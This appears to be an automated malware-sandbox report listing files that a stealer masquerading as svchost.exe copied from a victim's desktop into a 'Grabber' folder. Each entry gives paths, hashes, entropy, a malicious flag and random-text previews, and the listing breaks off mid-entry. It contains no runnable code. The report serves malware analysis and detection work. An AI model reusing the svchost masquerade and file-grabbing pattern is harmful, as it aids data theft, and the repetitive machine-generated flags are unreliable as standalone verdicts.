                                                  SHA-512:6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
                                                  Malicious:true
                                                  Preview:GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\JDDHMPCDUJ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.687055908915499
                                                  Encrypted:false
                                                  SSDEEP:24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
                                                  MD5:94EDB575C55407C555A3F710DF2A8CB3
                                                  SHA1:3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
                                                  SHA-256:DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
                                                  SHA-512:F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
                                                  Malicious:false
                                                  Preview:JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:true
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:true
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\EIVQSAOTAQ.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692024230831571
                                                  Encrypted:false
                                                  SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                  MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                  SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                  SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                  SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                  Malicious:false
                                                  Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIWXEWLAPUSHGKXWYYIJNUMGQHBJPMOYZIXPGOJLOQG

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\EOWRVPQCCS.jpg

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.692990330209164
                                                  Encrypted:false
                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NVWZAPQSQL\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
